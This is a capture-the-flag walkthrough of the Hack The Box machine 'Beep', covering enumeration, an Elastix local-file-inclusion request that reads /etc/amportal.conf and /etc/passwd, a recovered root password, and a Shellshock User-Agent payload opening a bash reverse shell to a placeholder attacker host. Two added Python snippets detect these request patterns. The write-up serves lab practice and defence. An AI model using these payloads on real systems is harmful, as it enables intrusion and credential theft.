# Beep

<div align="left"><figure><img src="/files/yrlresxnCmI0bOs4R83Q" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:red;">nmap:</mark>

As usual, let's start by scanning for open services using nmap:

```bash
nmap -sC -sV -oA beep 10.10.10.7
```

<div align="left"><figure><img src="/files/9QvP39RAs7kcDv0hcEiC" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:red;">content discovery using gobuster:</mark>

```bash
gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error
```

<div align="left"><figure><img src="/files/MOXqDBiQPR2pPQOCkPXG" alt=""><figcaption></figcaption></figure></div>

If we browse to /admin, it will prompt us for the admin password. If you don't have a password, it will show this page:

<div align="left"><figure><img src="/files/PRe1TCL7fXw6xP5zLGvW" alt=""><figcaption></figcaption></figure></div>

I couldn't go any further, so I checked for Elastix exploits using searchsploit:

<div align="left"><figure><img src="/files/nZrNYmhuT8RdebqfQkIQ" alt=""><figcaption></figcaption></figure></div>

The one that seems to work is the LFI vulnerability.

Let's run the command `searchsploit -x <PATH>` to analyze the exploit:

<div align="left"><figure><img src="/files/Kw1Hn5vpYBE2TGFVtY0o" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Method 1 => LFI to RCE</mark>

Now let's visit the Exploit-DB URL to take a look at the exploit:

{% embed url="<https://www.exploit-db.com/exploits/37637>" %}

<div align="left"><figure><img src="/files/913LrZ95kaZwgJ7cYUFE" alt=""><figcaption></figcaption></figure></div>

Let's visit this path:

```text
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
```

<figure><img src="/files/8xWtawkHa65gMBP3rRcE" alt=""><figcaption></figcaption></figure>

Reviewing the source code of this page reveals the admin password:

<div align="left"><figure><img src="/files/vExYxD6GAxmjnLQKLlW1" alt=""><figcaption></figcaption></figure></div>

We can use this password to log in to the Elastix login form.

Now let's disclose /etc/passwd:

```text
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
```

<div align="left"><figure><img src="/files/MCuekH3oT7z4PbgafA06" alt=""><figcaption></figcaption></figure></div>

Now SSH to the Beep box as the user root with the password we found in the amportal.conf page:

<mark style="color:blue;">**root : jEhdIekWmdjE**</mark>

```bash
ssh root@10.10.10.7
```
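
Seen from the defender's side, both requests above have the same shape: a traversal sequence and a null byte inside `current_language`. The Python below is an added example, not part of the original walkthrough or the exploit; it flags that shape in request targets taken from a web access log and shows an allowlist check for the parameter. The `en_us`-style code pattern, the function names and the sample targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: valid language codes look like "en_us"; use the app's real list.
LANG_ALLOWED = re.compile(r"[a-z]{2}_[a-z]{2}")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return findings for one request target; an empty list means clean."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl decodes once; keep_blank_values keeps bare keys like "action".
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)
        if "\x00" in value:
            findings.append(f"{name}: null byte")
        if TRAVERSAL.search(value):
            findings.append(f"{name}: path traversal")
        if name == "current_language" and not LANG_ALLOWED.fullmatch(value):
            findings.append(f"{name}: not an allowed language code")
    return findings

# Constructed sample request targets (the second mirrors the URL shown above).
SAMPLE_TARGETS = [
    "/vtigercrm/graph.php?current_language=en_us&module=Accounts&action",
    "/vtigercrm/graph.php?current_language=../../../../../../../..//etc/"
    "amportal.conf%00&module=Accounts&action",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(inspect_request(target) or "clean", "<-", target[:60])
```

The same allowlist check belongs in the application itself: a parameter that selects a file should be matched against known values before it is ever joined into a path.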

## <mark style="color:red;">Method 2 => RCE through Shellshock</mark>

After the nmap scan, we found that port 10000 is open and running Webmin httpd. Let's visit it:

When we submit wrong credentials, it shows the session\_login.cgi directory:

![](/files/vgqbFux8laHr1HvfUrOf)

CGI scripts that use the Bash shell to process user input were particularly susceptible to exploitation, and there is a famous vulnerability called Shellshock that abuses CGI scripts to execute arbitrary code.

<div align="left"><figure><img src="/files/ESk8ysCmgcf4D0did817" alt=""><figcaption></figcaption></figure></div>

So let's test whether this CGI script is vulnerable to the Shellshock attack.

Let's capture the login submission using Burp Suite and replace the User-Agent value with a Bash one-liner reverse-shell Shellshock payload:

```bash
() { :;}; bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1
```

Before sending this request, we have to start listening on the port we specified in the payload; for me it was 443.

<div align="left"><figure><img src="/files/SHJZF1w8rG4fTXtmcqMb" alt=""><figcaption></figcaption></figure></div>

Now let's send the request using Burp:

<div align="left"><figure><img src="/files/otXqd90wbnNolCrbz5gS" alt=""><figcaption></figcaption></figure></div>

And we get back a reverse shell:

<div align="left"><figure><img src="/files/bdo0KmXpd6mOcTnCaN7k" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/Mc36FYkBKnACpdfBfu2P" alt=""><figcaption></figcaption></figure></div>
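
The request used in this method is easy to spot on the wire because the header value starts with a Bash function definition. The Python below is an added example, not part of the original walkthrough; it maps request headers to the `HTTP_*` variables a CGI server exports, reports any value shaped like `() {` together with the command that follows it, and drops such headers. The function names and the sample headers are assumptions constructed for illustration.

```python
import re

# Vulnerable Bash versions parsed an environment value starting with "() {"
# as a function definition and then ran whatever followed the closing brace.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

def to_cgi_env(headers):
    """Map request headers to the HTTP_* variables a CGI server exports."""
    return {"HTTP_" + k.upper().replace("-", "_"): v for k, v in headers.items()}

def shellshock_findings(headers):
    """Return {variable: trailing command} for values shaped like a function."""
    findings = {}
    for var, value in to_cgi_env(headers).items():
        if FUNC_PREFIX.match(value):
            # Text after the first closing brace is what Bash would have run.
            findings[var] = value.partition("}")[2].lstrip(" ;\t")
    return findings

def scrub(headers):
    """Drop offending headers so they never reach a Bash-backed CGI handler."""
    bad = {var[len("HTTP_"):] for var in shellshock_findings(headers)}
    return {k: v for k, v in headers.items()
            if k.upper().replace("-", "_") not in bad}

# Constructed sample requests; the trailing command is an inert echo.
BENIGN = {"Host": "10.10.10.7:10000", "User-Agent": "Mozilla/5.0 (X11; Linux)"}
SUSPECT = {"Host": "10.10.10.7:10000", "User-Agent": "() { :;}; echo probe"}

if __name__ == "__main__":
    for request in (BENIGN, SUSPECT):
        print(shellshock_findings(request), scrub(request))
```

Scrubbing headers at a proxy is a stopgap; the fix is a patched Bash on the host that runs the CGI scripts.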

Hope you found this walkthrough easy to understand and follow.

Greetings from [<mark style="color:red;">Sayonara</mark>](https://github.com/ismail-arame)


